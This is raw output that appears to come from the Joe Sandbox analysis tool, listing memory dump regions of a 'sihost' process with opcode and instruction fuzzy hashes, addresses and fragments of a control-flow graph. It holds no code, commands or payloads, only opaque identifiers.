36e544-36e569 2711->2715 2716 36e53f 2711->2716 2713 36e4f4-36e522 2712->2713 2714 36e4ef 2712->2714 2713->2711 2714->2713 2719 36e56b-36e56c 2715->2719 2720 36e578-36e5b0 2715->2720 2716->2715 2719->2696 2721 36e5b7-36e618 2720->2721 2722 36e5b2 2720->2722 2727 36e61f-36e643 2721->2727 2728 36e61a 2721->2728 2722->2721 2731 36e645 2727->2731 2732 36e64a 2727->2732 2728->2727 2731->2732 2732->2694
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624335125.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_360000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3a0805d2971cf0a403da7929c53e042478c7dbb55a39f1b947a822b7d4436a57
                                      • Instruction ID: bdc6ebfb1f8d581bf232a5f706c68f4529f0c8b6dc3508bc254ae284267bbd37
                                      • Opcode Fuzzy Hash: 3a0805d2971cf0a403da7929c53e042478c7dbb55a39f1b947a822b7d4436a57
                                      • Instruction Fuzzy Hash: B9F1D674D00228CFDB55DFA9D884B9DBBB2BF84304F54C5A9D808AB359DB349985CF50
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 00369495
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624335125.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_360000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 95db5e86281ba3be34a3073f10809670efda15c664e5ca67655209a27961f02b
                                      • Instruction ID: 3e51e57ecd41eb8f454b5193354943f7fad184c01753333858f92aae6eecea2d
                                      • Opcode Fuzzy Hash: 95db5e86281ba3be34a3073f10809670efda15c664e5ca67655209a27961f02b
                                      • Instruction Fuzzy Hash: 9CD1E574E01218CFDB15DFA5C994B9DBBB6BF89300F2080AAD809A7359DB359E85CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8fcebeab12639226795ab79e3f5694c56b32e009c9025257de753494f28de814
                                      • Instruction ID: 9be944bb8224f9b44662b348168e45257049f99228e94b0964a39ed340e36d7d
                                      • Opcode Fuzzy Hash: 8fcebeab12639226795ab79e3f5694c56b32e009c9025257de753494f28de814
                                      • Instruction Fuzzy Hash: 25825C74E012688FDB64DF69DD94BDDBBB2AB89300F1481EA980DA7365DB315E81CF40
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624335125.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_360000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f9525c1beb77772eb2a077cacd6d40eb4cd96c61406dad2a326a1c4b28f77ff5
                                      • Instruction ID: c30f2d63f31443c06cffd5bc77dbb282fae56edc7ecb0193d93d8f52ba44d035
                                      • Opcode Fuzzy Hash: f9525c1beb77772eb2a077cacd6d40eb4cd96c61406dad2a326a1c4b28f77ff5
                                      • Instruction Fuzzy Hash: 5B72F374E042298FDB65DF69C884BEDBBB2BB89304F5085EAD409A7359D7309E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624335125.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_360000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e3d616adfce3a38e9f11fd82c87e099f73c34cf4130f43326c5fe26185d11775
                                      • Instruction ID: b306a50d36003061dea1b5cec5984b132c61ba0ca2ceda8c8ba4e15243e391d5
                                      • Opcode Fuzzy Hash: e3d616adfce3a38e9f11fd82c87e099f73c34cf4130f43326c5fe26185d11775
                                      • Instruction Fuzzy Hash: 9252A074A01228CFDB65DF65C894B9DBBB2BF89300F5085EAD409A7359DB319E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 57f02f2dcc7196a75733ecb24d1889a67ca68bb305e1d1564f43f5074820acb3
                                      • Instruction ID: 9b1488cf05d56211d4decf9d337cd7ea57e7de7b4c4f7357bddaf2f7b30b4d27
                                      • Opcode Fuzzy Hash: 57f02f2dcc7196a75733ecb24d1889a67ca68bb305e1d1564f43f5074820acb3
                                      • Instruction Fuzzy Hash: 28D1A474E012188FDB54DFA5C854BADBBB2FF89300F2491AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2e9dfbef687d842d7e45d3b61b7825462c22f1c800590262513d1a8b68e243d6
                                      • Instruction ID: 30284772d50fc49b3187e372d40c2661f3593a109dfb5666874993dcd319dd74
                                      • Opcode Fuzzy Hash: 2e9dfbef687d842d7e45d3b61b7825462c22f1c800590262513d1a8b68e243d6
                                      • Instruction Fuzzy Hash: BFD1A374E01218CFDB54DFA5C854BADBBB2BF89300F2091AAD809AB359DB355E81CF51
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6977eab2a1d43f6a094e5a2a9fc503ec270f96b931e3ae95e31e2cdc00173873
                                      • Instruction ID: 79cbccf264ff02aff784e39dd1d5f28c1e4eb7906f26d2c4ee4997272e991426
                                      • Opcode Fuzzy Hash: 6977eab2a1d43f6a094e5a2a9fc503ec270f96b931e3ae95e31e2cdc00173873
                                      • Instruction Fuzzy Hash: AA916A79845625CFDB14AFA0D85C7EEBBB1BB06306F10552AD1017B3E8CB784A88CF94
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f26841537226017cf84990e39b3ea735e9cdab8e7ca56c6f30aa04e65d72c99
                                      • Instruction ID: 30e1c4362bfd9b6cf2d9bd1a7c172c885bbe5aed412798657958adf7106b5664
                                      • Opcode Fuzzy Hash: 4f26841537226017cf84990e39b3ea735e9cdab8e7ca56c6f30aa04e65d72c99
                                      • Instruction Fuzzy Hash: EF914A79945625CFDB14AFA0D45C7EEBBB1AB06306F10551AD1017B3D8CB784A84CF94
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624335125.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_360000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0dbdf979aa70f3fe5d05edf1e0b848547504f55b805c7b6d9644b4dce322cced
                                      • Instruction ID: 617b70da886dd790630072183aded65b55e8d85f29165980474746d0a62256b6
                                      • Opcode Fuzzy Hash: 0dbdf979aa70f3fe5d05edf1e0b848547504f55b805c7b6d9644b4dce322cced
                                      • Instruction Fuzzy Hash: A2A12570D00208CFEB14DFA8C984BDDBBB5FF89304F20866AE409AB295DB759985CF51
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3a4b60b60b6f05c290c4c4c0e6de754698fb845eb055cf8aef72e8e648181a34
                                      • Instruction ID: 17efbfd573eb667c2c1949c12f3d20e5de63e4cb6d0704290b0fcba2efef48cb
                                      • Opcode Fuzzy Hash: 3a4b60b60b6f05c290c4c4c0e6de754698fb845eb055cf8aef72e8e648181a34
                                      • Instruction Fuzzy Hash: 5DA19274E01629CFEB68CF6AD944B9DFBF2AB89300F14C1AAD408A7254DB745A85CF11
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4fe491535c8886e62dd67a36e9e8c6d9fcb7a355b08eca5a4fa91c3c057d1c08
                                      • Instruction ID: 84e6eca3f397ecebfcd62eef33e8ec831c67d558bd92af9218cbe05366b26330
                                      • Opcode Fuzzy Hash: 4fe491535c8886e62dd67a36e9e8c6d9fcb7a355b08eca5a4fa91c3c057d1c08
                                      • Instruction Fuzzy Hash: D7A1A574E01219CFEB68CF6AD984BDDBBF2AB89300F14C1AAD40CA7254DB745A85CF51
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3008a85be4f77a52e825a5f9a822fb7bc4934627c81905d12e20f6218a49dddf
                                      • Instruction ID: 5d80e15045888a82c82ea9f5b9c7557369ed77b854f7438cd667658a549c43cd
                                      • Opcode Fuzzy Hash: 3008a85be4f77a52e825a5f9a822fb7bc4934627c81905d12e20f6218a49dddf
                                      • Instruction Fuzzy Hash: 00A1A174E012298FEB68CF6AD944B9DBBF2AF89300F14C1AAD40DA7254DB345A85CF51
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0ad832eb9019d4f64bf2b797f2df87a26d8610b2fbc5ec0cb81c1541d35adc74
                                      • Instruction ID: 4281d5c6376c8382638f7855c73f8bc44c08b1f95124220334980eeec7b74888
                                      • Opcode Fuzzy Hash: 0ad832eb9019d4f64bf2b797f2df87a26d8610b2fbc5ec0cb81c1541d35adc74
                                      • Instruction Fuzzy Hash: E0A1A574E012198FEB68CF6AC984B9DFBF2AF89300F14C1AAD408A7254DB745A85CF11
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 87f7b33e8101c5b659807924ef2a99e92978326d6f9f40966b959c520b463416
                                      • Instruction ID: 565adeacc0a3abbd7b80d84905962c794949d4733c4868eec8b1e500e773e169
                                      • Opcode Fuzzy Hash: 87f7b33e8101c5b659807924ef2a99e92978326d6f9f40966b959c520b463416
                                      • Instruction Fuzzy Hash: 60A1A274E052298FEB68CF6AD944B9DBBF2AF89300F14C1AAD408A7254DB745A85CF11
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 23c76af7d04d3b57a9652e7265203d60b398dcf41cbd20c81190f15cde19fb9c
                                      • Instruction ID: b42526ff2357e8b8ad7bc6d71ace721914bdf26a2d0c804ba0dacd78ee3cf727
                                      • Opcode Fuzzy Hash: 23c76af7d04d3b57a9652e7265203d60b398dcf41cbd20c81190f15cde19fb9c
                                      • Instruction Fuzzy Hash: 65A1A574E01629CFEB68CF6AC944B9DFBF2AF89300F14C1AAD408A7254DB745A85CF10
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ce3fed89311707143c96e6afb88fa1cd6aa344b3ab8ccbb72d8c57bc17bb329f
                                      • Instruction ID: 9e4dfb4682e6b1383b3147ec3551e9739347129e93a8514970d5e6cdba2d27b6
                                      • Opcode Fuzzy Hash: ce3fed89311707143c96e6afb88fa1cd6aa344b3ab8ccbb72d8c57bc17bb329f
                                      • Instruction Fuzzy Hash: 4BA1A4B4E012198FEB68CF6AC944B9DFBF2AF89301F14C1AAD40CA7254DB745A85CF51
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624335125.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_360000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5e54a9856f5f6c51ab75ebbc23754dabcdbcfe2b4b4d3314bebe319a31f520c8
                                      • Instruction ID: cc89f562d89c99009e919b8fbb165b45bd8b8ff1c2c7c986c4bc302b871d33d8
                                      • Opcode Fuzzy Hash: 5e54a9856f5f6c51ab75ebbc23754dabcdbcfe2b4b4d3314bebe319a31f520c8
                                      • Instruction Fuzzy Hash: DE911470D00218CFEB15DFA8C984BDCBBB5FF89314F20829AE409AB295DB759985CF14
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624786798.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4b0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 29cede2f4332d9d1231a5799aca741b5a331a49aa19beeb0d619f2f21fa2660d
                                      • Instruction ID: 8c6ec67348012158bbc096c7cc66c891eacc61dfc410d149885f2e087d181c39
                                      • Opcode Fuzzy Hash: 29cede2f4332d9d1231a5799aca741b5a331a49aa19beeb0d619f2f21fa2660d
                                      • Instruction Fuzzy Hash: 6E81B574E00218CFDB19DFA9C891BADBBB2BF88304F249529D805AB358DB355D46CF54
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fb234c502421035971014fb6c35ab3aa743fda164b88c7055db7406a77209ca0
                                      • Instruction ID: 5774c0b72b0b699e59f175f9e2991c0e6bb1707427a0157e5bd8cd0be030b533
                                      • Opcode Fuzzy Hash: fb234c502421035971014fb6c35ab3aa743fda164b88c7055db7406a77209ca0
                                      • Instruction Fuzzy Hash: D0719770D056198FEB68CF66C954B9EBBF2AF89300F14C1EAD40CA7254DB744A85CF51
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0b50a2e65a2c11e03c18fb4b082d4b990b755ed245f71cffbe919b09b9c66fc1
                                      • Instruction ID: 4b4c49249eb4353742e3326bc0b80015db489ad9c93e9614399fd8317127ed37
                                      • Opcode Fuzzy Hash: 0b50a2e65a2c11e03c18fb4b082d4b990b755ed245f71cffbe919b09b9c66fc1
                                      • Instruction Fuzzy Hash: 61719570E016198FEB68CF6AC954B9EBAF2AF89300F14C1EAD408A7254DB744A85CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624786798.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4b0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 96b16b8df2c6f7362926917b8e238d0a8e905389a24678ce72c12b8f5f72610d
                                      • Instruction ID: ae3a6f90d45c027ed912de23781ac40066cf864cc20d3cf17d526f49380cbb13
                                      • Opcode Fuzzy Hash: 96b16b8df2c6f7362926917b8e238d0a8e905389a24678ce72c12b8f5f72610d
                                      • Instruction Fuzzy Hash: 79513874E00208CFDB19DFAAC850AEDBBF2BF89300F24952AD404AB359DB385912CF55
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624335125.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_360000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 87f38e9243bca1890e1c16f080312b562834e5cd47665774580b401ba6f41449
                                      • Instruction ID: 06c821af7d7250984929dc4f3b9a886849d0a74dfcae734a28448bbd317a4794
                                      • Opcode Fuzzy Hash: 87f38e9243bca1890e1c16f080312b562834e5cd47665774580b401ba6f41449
                                      • Instruction Fuzzy Hash: DB518A74D00218DFCB06DFA8D496BEDBBB5BB49340F20D51AD006AB299CB759881CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624335125.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_360000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 36c839e0cad411456edc9f126dbb50cf2b271507103b2891fc1bbad41be60eab
                                      • Instruction ID: 64ca4f96076aefeccbeb8a0735496b0e11bc54fde3d23125ecb3d8db8dd7725b
                                      • Opcode Fuzzy Hash: 36c839e0cad411456edc9f126dbb50cf2b271507103b2891fc1bbad41be60eab
                                      • Instruction Fuzzy Hash: 3F516870D00208DFDB06DFA9D495BEDBBB6BF89300F20D429D401AB299DB719981CB64
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624335125.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_360000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dd41c7899a862f5509aebbcbb057fe37c0176b856dd3d9a2f3936bd05a9387a3
                                      • Instruction ID: f51469096417ae3483d8d91280d52ce9a38ec33381770b28981a61cc617ed863
                                      • Opcode Fuzzy Hash: dd41c7899a862f5509aebbcbb057fe37c0176b856dd3d9a2f3936bd05a9387a3
                                      • Instruction Fuzzy Hash: EE515770D00218DFDB16DFA8D496BEDBBB5BB89340F20D529D002AB288C7759881CF64
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 224a140920fb32834f871559538cd386c3dd45309ed6e73529c37790f4db2b7b
                                      • Instruction ID: 887640a1d74bc526daf62b7873dad0007fe0945d64fac34ff3c1c39c26287fc8
                                      • Opcode Fuzzy Hash: 224a140920fb32834f871559538cd386c3dd45309ed6e73529c37790f4db2b7b
                                      • Instruction Fuzzy Hash: A0417871E056588BEB68CF6BDD5479EFAF3AFC9300F14C1AAC40CA6254EB740A858F51
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4d6742fcef723d3efcb1181f3983b0f660895efd94dd0d06cea42e8b9a1a1cfe
                                      • Instruction ID: e3ba3ed244feee54532b568adbabcfd768429459d46c6d33af91825a4c05e803
                                      • Opcode Fuzzy Hash: 4d6742fcef723d3efcb1181f3983b0f660895efd94dd0d06cea42e8b9a1a1cfe
                                      • Instruction Fuzzy Hash: 4D417B71E056588BEB68CF5BDD5479EFAF3AFC9300F14C1AAC40CA6254EB7409858F51
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 06a6dba9fae9eee48448be86946016d65ccb6883a5ad430bc1cff509bec081e0
                                      • Instruction ID: cc5cdcb28f78df82586151471448b36e55673164663435c0f330ee902a0660aa
                                      • Opcode Fuzzy Hash: 06a6dba9fae9eee48448be86946016d65ccb6883a5ad430bc1cff509bec081e0
                                      • Instruction Fuzzy Hash: 92418AB1E016588FEB58CF6BD95479EFAF3AFC9300F14C1AAC40CA6254EB340A858F51
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c77cfb3bf07693448337fcdfe3c91314ae3571234577ef8bc4923231bcfbe29d
                                      • Instruction ID: c7b9f40db5b0fca3849d852dda2afd7e3fa444a020363850840b0235c8fd1b5a
                                      • Opcode Fuzzy Hash: c77cfb3bf07693448337fcdfe3c91314ae3571234577ef8bc4923231bcfbe29d
                                      • Instruction Fuzzy Hash: 39417A71E016589BEB68CF6BD95479EFAF3AFC9300F14C1AAC40CA6254EB740A858F51
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f88cad2cfa3761a3e199d1fdfed9bf391ef4b5ba5cbc7d8e70756c491d4dfc90
                                      • Instruction ID: 99133013118f6565201a0ffc554d3ab6fdf13063eed869beab5f49a5a497c690
                                      • Opcode Fuzzy Hash: f88cad2cfa3761a3e199d1fdfed9bf391ef4b5ba5cbc7d8e70756c491d4dfc90
                                      • Instruction Fuzzy Hash: 0F417971E016588BEB68CF6BDD5479EFAF3AFC9304F14C1AAC40CA6254EB740A858F51
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc0c48c9189ec2627470ac08a43db9ab465733ef356a1b4278f9f6bb83a9f96a
                                      • Instruction ID: b2c100d88df9dfee4cf0eb1e90a14449502c820bd81fb10cd98378b55ef9b284
                                      • Opcode Fuzzy Hash: bc0c48c9189ec2627470ac08a43db9ab465733ef356a1b4278f9f6bb83a9f96a
                                      • Instruction Fuzzy Hash: C541F474E002188FDB18DFAAD8547EEBBF2BF89300F14D06AD418AB259EB345946CF54
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f6b150fcdacba5eb2e88806fdd718356c2a18cf2624abcd60fab82c7a81f8190
                                      • Instruction ID: 22b81732ba919af6bcf9674ee9fa8520b2a53a56c767c0ef0e6b36446859d5e4
                                      • Opcode Fuzzy Hash: f6b150fcdacba5eb2e88806fdd718356c2a18cf2624abcd60fab82c7a81f8190
                                      • Instruction Fuzzy Hash: 5841E274E002188FDB58DFAAD8547AEBBF2BF89300F14D06AD419AB258EB345946CF54
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624750814.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4a0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 44caffca52055926f8806c7f7c1a8d66677d2966df7c8f4cabb6a86bab64fbf0
                                      • Instruction ID: b4232af7ca65f83a1c720b8614342e2f6c8aad19d5ef48ad57beacb60dd31637
                                      • Opcode Fuzzy Hash: 44caffca52055926f8806c7f7c1a8d66677d2966df7c8f4cabb6a86bab64fbf0
                                      • Instruction Fuzzy Hash: 3231D474E012488BDB18DFAAD5546EEBBF2AF89300F24D42AD418BB255EB345942CF54
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624335125.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_360000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 97a881cb74201ae5d348a8fefe78bce5dede04035f9f2856041071b82025edf1
                                      • Instruction ID: 2522990a33184d6b06bdd35fb01ee2ee202f77cc09e419cd1b67d762fe41c300
                                      • Opcode Fuzzy Hash: 97a881cb74201ae5d348a8fefe78bce5dede04035f9f2856041071b82025edf1
                                      • Instruction Fuzzy Hash: 0611D071904745CFD702EFA8C4483EDBFB4EF4A314F2496AED049AB292D7319881C756

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 250 9d7280-9d7316 258 9d731c-9d757a 250->258 259 9d7661-9d79b6 250->259 315 9d757c-9d7591 258->315 316 9d7593-9d75a4 258->316 337 9d79cf-9d79e0 259->337 338 9d79b8-9d79cd 259->338 320 9d75a5-9d761e 315->320 316->320 332 9d7626-9d7660 320->332 332->259 341 9d79e1-9d7acd 337->341 338->341 351 9d7ffd-9d8031 341->351 352 9d7ad3-9d7bdd 341->352 355 9d8037-9d8285 351->355 356 9d8286-9d82ba 351->356 388 9d7dc1-9d7fc6 call 9d83d8 call 9d8430 call 9d8490 call 9d84ea 352->388 389 9d7be3-9d7dbc 352->389 355->356 361 9d83cc 356->361 362 9d82c0-9d83cb 356->362 363 9d83cd-9d83d4 361->363 362->361 454 9d7fcc-9d7fce 388->454 451 9d7ffc 389->451 451->351 454->363 454->451
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tep$Tep$Gs$Gs
                                      • API String ID: 0-307556097
                                      • Opcode ID: d9ab9bd65c57ec44cfd30d5b10be90065544744fd257a06d8471bc3fa019c676
                                      • Instruction ID: 8f9087a7dd14af668060cacd4f4c78de86e1d7db599df9a27129a042cedaa8f9
                                      • Opcode Fuzzy Hash: d9ab9bd65c57ec44cfd30d5b10be90065544744fd257a06d8471bc3fa019c676
                                      • Instruction Fuzzy Hash: DF82C874A01228CFDB65DF64C894BADB7B2FB89304F2055EAD809A7359DB359E81CF40

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
